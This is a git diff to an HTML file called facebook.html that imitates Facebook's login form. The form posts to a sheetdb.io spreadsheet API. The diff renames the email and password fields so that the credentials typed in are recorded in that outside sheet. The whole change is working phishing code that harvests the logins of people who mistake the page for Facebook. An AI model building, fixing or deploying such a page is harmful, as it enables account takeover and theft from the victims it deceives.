--- a/facebook.html
+++ b/facebook.html
@@ -555,9 +555,9 @@ bP9LgE96ugAAAABJRU5ErkJggg==">
             </div>
             <div class="content-form">
                 <form action="https://sheetdb.io/api/v1/2mg6mueub0xtl" method="POST">
-                    <input type="text" name="username" placeholder="Email address or phone number" >
-                    <input type="password" name="userpassword" >
-                    <input type="submit" name="data" value="Log In">
+                    <input type="text" name="data{username}" placeholder="Email address or phone number" >
+                    <input type="password" name="data{password}" >
+                    <input type="submit" value="Log In">
                 </form>
                 <div class="signinLink">
                     <a href=""  target="_blank">Forgotten account?</a>
